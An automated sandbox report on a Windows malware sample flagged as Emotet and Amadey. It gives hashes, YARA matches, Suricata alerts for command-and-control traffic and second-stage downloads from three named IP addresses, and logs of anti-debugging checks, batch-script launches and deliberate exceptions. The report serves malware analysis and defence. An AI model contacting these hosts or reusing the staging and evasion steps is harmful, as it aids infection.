Summary | ZeroBOX

download.php

Emotet Gen1 PhysicalDrive Generic Malware Themida .NET framework(MSIL) UPX Downloader Antivirus Malicious Library Malicious Packer Admin Tool (Sysinternals etc ...) Escalate priviledges ScreenShot Create Service Http API DGA PWS Steal credential Socket
Category Machine Started Completed
FILE s1_win7_x6401 May 4, 2025, 12:45 p.m. May 4, 2025, 12:50 p.m.
Size 4.7MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 495905a33187563768a8e210f43bc31f
SHA256 2fd927bea5dfa7f7758137ec3603faf63c60890355456888be9e194ed95daa7f
CRC32 10A1A8E2
ssdeep 98304:t8rKNYx7s7GeVF/hw7yctrDMwQxjTs6yg9BJ+I4WRNz7cwQXAmwiRc:Crjx7Be7avrDMwQxtB4MRl7cxXpc
PDB Path wextract.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • CAB_file_format - CAB archive file
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
185.156.72.96 Active Moloch
80.64.18.219 Active Moloch
80.64.18.63 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 185.156.72.96:80 -> 192.168.56.101:49178 2400031 ET DROP Spamhaus DROP Listed Traffic Inbound group 32 Misc Attack
TCP 185.156.72.96:80 -> 192.168.56.101:49178 2060969 ET MALWARE Amadey CnC Response Malware Command and Control Activity Detected
TCP 192.168.56.101:49193 -> 80.64.18.219:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49227 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 80.64.18.219:80 -> 192.168.56.101:49227 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49227 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49193 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 80.64.18.219:80 -> 192.168.56.101:49193 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49193 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49227 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49227 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49227 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.101:49227 -> 80.64.18.219:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49500 -> 80.64.18.63:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 80.64.18.63:80 -> 192.168.56.101:49500 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 80.64.18.63:80 -> 192.168.56.101:49500 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 80.64.18.63:80 -> 192.168.56.101:49500 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: if
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: "" /min "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: exit
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /b
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: if
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: "any_word" == ""
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: "" /min "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: exit
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /b
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: chcp
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: nul
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Color
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 0f
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: set
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: "Arch="
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: set
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: "ArgNsudo="
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: set
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: "MainFolder1="
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: set
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: "MainFolder2="
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: set
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: "ProcList="
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: set
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: "NumberWin="
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SetLocal
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: EnableDelayedExpansion
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: cd
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /d "C:\Users\test22\AppData\Local\Temp\Work"
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\Work>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: set
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: "Arch=x64"
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: If
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: "x86" == "x86"
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: if
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: not
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: defined PROCESSOR_ARCHITEW6432
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: set
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Arch=x86
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\Work>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: reg
console_handle: 0x00000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path wextract.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file c:\program files\mozilla firefox\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
resource name AVI
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
1z90e9+0x1b9873 @ 0xfa9873
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x1241d9
exception.instruction: div eax
exception.module: 1z90E9.exe
exception.exception_code: 0xc0000094
exception.offset: 1196505
exception.address: 0xf141d9
registers.esp: 3734412
registers.edi: 16400524
registers.eax: 0
registers.ebp: 3734440
registers.edx: 0
registers.ebx: 12989360
registers.esi: 6
registers.ecx: 12989360
1 0 0

__exception__

stacktrace:
1z90e9+0x1b9873 @ 0xfa9873
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734412
registers.edi: 3734412
registers.eax: 0
registers.ebp: 3734440
registers.edx: 2
registers.ebx: 15811055
registers.esi: 0
registers.ecx: 3734620
1 0 0

__exception__

stacktrace:
1z90e9+0x1b9873 @ 0xfa9873
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734412
registers.edi: 3734412
registers.eax: 0
registers.ebp: 3734440
registers.edx: 2
registers.ebx: 15811098
registers.esi: 0
registers.ecx: 3734620
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcc64 @ 0xfacc64
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734364
registers.edi: 16400524
registers.eax: 0
registers.ebp: 3734392
registers.edx: 2
registers.ebx: 10870784
registers.esi: 15065088
registers.ecx: 15065088
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcc64 @ 0xfacc64
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 2
registers.ebx: 15811098
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcc64 @ 0xfacc64
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x1241d9
exception.instruction: div eax
exception.module: 1z90E9.exe
exception.exception_code: 0xc0000094
exception.offset: 1196505
exception.address: 0xf141d9
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 0
registers.ebx: 15811098
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcc64 @ 0xfacc64
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 2
registers.ebx: 15811055
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcd40 @ 0xfacd40
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734364
registers.edi: 16400524
registers.eax: 0
registers.ebp: 3734392
registers.edx: 2
registers.ebx: 10870784
registers.esi: 15065088
registers.ecx: 3446298575
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcd40 @ 0xfacd40
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x1241d9
exception.instruction: div eax
exception.module: 1z90E9.exe
exception.exception_code: 0xc0000094
exception.offset: 1196505
exception.address: 0xf141d9
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 0
registers.ebx: 15811098
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcd40 @ 0xfacd40
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x1241d9
exception.instruction: div eax
exception.module: 1z90E9.exe
exception.exception_code: 0xc0000094
exception.offset: 1196505
exception.address: 0xf141d9
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 0
registers.ebx: 15811055
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcd40 @ 0xfacd40
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 2
registers.ebx: 15811055
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcd40 @ 0xfacd40
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 2
registers.ebx: 15811098
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bce12 @ 0xface12
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x1241d9
exception.instruction: div eax
exception.module: 1z90E9.exe
exception.exception_code: 0xc0000094
exception.offset: 1196505
exception.address: 0xf141d9
registers.esp: 3734364
registers.edi: 16400524
registers.eax: 0
registers.ebp: 3734392
registers.edx: 0
registers.ebx: 10870784
registers.esi: 15065088
registers.ecx: 3734392
1 0 0

__exception__

stacktrace:
1z90e9+0x1bce12 @ 0xface12
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 2
registers.ebx: 15811055
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bce12 @ 0xface12
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 2
registers.ebx: 15811098
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcf0c @ 0xfacf0c
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734364
registers.edi: 16400524
registers.eax: 0
registers.ebp: 3734392
registers.edx: 2
registers.ebx: 10870784
registers.esi: 15065088
registers.ecx: 0
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcf0c @ 0xfacf0c
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 2
registers.ebx: 15811098
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcf0c @ 0xfacf0c
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x1241d9
exception.instruction: div eax
exception.module: 1z90E9.exe
exception.exception_code: 0xc0000094
exception.offset: 1196505
exception.address: 0xf141d9
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 0
registers.ebx: 15811098
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcfa2 @ 0xfacfa2
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x1241d9
exception.instruction: div eax
exception.module: 1z90E9.exe
exception.exception_code: 0xc0000094
exception.offset: 1196505
exception.address: 0xf141d9
registers.esp: 3734364
registers.edi: 16400524
registers.eax: 0
registers.ebp: 3734392
registers.edx: 0
registers.ebx: 10870784
registers.esi: 15065088
registers.ecx: 3849650670
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcfa2 @ 0xfacfa2
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x1241d9
exception.instruction: div eax
exception.module: 1z90E9.exe
exception.exception_code: 0xc0000094
exception.offset: 1196505
exception.address: 0xf141d9
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 0
registers.ebx: 15811055
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcfa2 @ 0xfacfa2
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 2
registers.ebx: 15811055
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcfa2 @ 0xfacfa2
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x1241d9
exception.instruction: div eax
exception.module: 1z90E9.exe
exception.exception_code: 0xc0000094
exception.offset: 1196505
exception.address: 0xf141d9
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 0
registers.ebx: 15811098
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
1z90e9+0x1bcfa2 @ 0xfacfa2
1z90e9+0x1c0029 @ 0xfb0029
1z90e9+0x1478dc @ 0xf378dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: 1z90e9+0x124204
exception.instruction: ud2
exception.module: 1z90E9.exe
exception.exception_code: 0xc000001d
exception.offset: 1196548
exception.address: 0xf14204
registers.esp: 3734364
registers.edi: 3734364
registers.eax: 0
registers.ebp: 3734392
registers.edx: 2
registers.ebx: 15811055
registers.esi: 0
registers.ecx: 3734400
1 0 0

__exception__

stacktrace:
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc
exception.symbol: 3v57i+0x2f80b9
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 3113145
exception.address: 0xc180b9
registers.esp: 1571448
registers.edi: 0
registers.eax: 1
registers.ebp: 1571464
registers.edx: 14344192
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 b9 f5 ff ff 50 e9 00 00 00 00 f7 14 24 58
exception.symbol: 3v57i+0x61804
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 399364
exception.address: 0x981804
registers.esp: 1571412
registers.edi: 1968898280
registers.eax: 27934
registers.ebp: 3999985684
registers.edx: 9568256
registers.ebx: 9964958
registers.esi: 3
registers.ecx: 1969094656
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 e9 44 f7 ff ff 52 ba 84 74
exception.symbol: 3v57i+0x6176f
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 399215
exception.address: 0x98176f
registers.esp: 1571416
registers.edi: 1968898280
registers.eax: 27934
registers.ebp: 3999985684
registers.edx: 4294942468
registers.ebx: 9992892
registers.esi: 2298801283
registers.ecx: 1969094656
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 c2 46 02 75 7e 81 c2 91 db f7 7a e9 73 02
exception.symbol: 3v57i+0x61c7f
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 400511
exception.address: 0x981c7f
registers.esp: 1571412
registers.edi: 1968898280
registers.eax: 32323
registers.ebp: 3999985684
registers.edx: 9968520
registers.ebx: 1960838688
registers.esi: 2298801283
registers.ecx: 1969094656
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 50 01 00 00 81 04 24 04 00 00 00 e9 48 ff
exception.symbol: 3v57i+0x61e3c
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 400956
exception.address: 0x981e3c
registers.esp: 1571416
registers.edi: 0
registers.eax: 239849
registers.ebp: 3999985684
registers.edx: 9971279
registers.ebx: 1960838688
registers.esi: 2298801283
registers.ecx: 1969094656
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ef c6 5f 4b 3f 50 b8 db 8b fa 7a e9 7d 05
exception.symbol: 3v57i+0x1d4fca
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 1920970
exception.address: 0xaf4fca
registers.esp: 1571412
registers.edi: 11489161
registers.eax: 25860
registers.ebp: 3999985684
registers.edx: 2130566132
registers.ebx: 7143533
registers.esi: 11473199
registers.ecx: 109
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 bc 00 00 00 53 52 ba 40 d3 1d 7e bb 5e ac
exception.symbol: 3v57i+0x1d53c9
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 1921993
exception.address: 0xaf53c9
registers.esp: 1571416
registers.edi: 11515021
registers.eax: 25860
registers.ebp: 3999985684
registers.edx: 2130566132
registers.ebx: 7143533
registers.esi: 11473199
registers.ecx: 109
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 0c 24 b9 11 b9 af 56 51
exception.symbol: 3v57i+0x1d519d
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 1921437
exception.address: 0xaf519d
registers.esp: 1571416
registers.edi: 11515021
registers.eax: 4294944296
registers.ebp: 3999985684
registers.edx: 2130566132
registers.ebx: 7143533
registers.esi: 11473199
registers.ecx: 77545
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 83 fe ff ff 89 14 24 68 aa 83 fc 7e 5a 31
exception.symbol: 3v57i+0x1d79b6
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 1931702
exception.address: 0xaf79b6
